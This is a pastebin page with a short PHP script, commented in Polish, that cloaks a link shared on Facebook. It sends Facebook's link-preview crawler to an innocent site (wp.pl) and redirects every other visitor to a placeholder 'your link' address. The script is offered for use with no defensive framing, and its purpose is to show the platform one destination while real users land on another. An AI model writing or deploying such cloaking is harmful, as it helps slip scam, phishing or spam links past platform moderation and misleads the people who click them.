This paste brought to you by Paste Code. View Raw

 1. <?php
 2.  
 3.         ob_start();
 4.  
 5.         $ua = $_SERVER['HTTP_USER_AGENT'];
 6.  
 7.         if (preg_match('/facebookexternalhit/si',$ua)) {
 8.                 echo "<script>window.location.href = 'http://wp.pl';</script>"; // tutaj strona, którą ma wiedzieć facebook
 9.                 die();
 10.         } else {
 11.                 echo "<script>window.location.href = 'twój_link';</script>"; // tutaj link, na który ma zostać przekierowany klient
 12.         }
 13.  
 14. ?>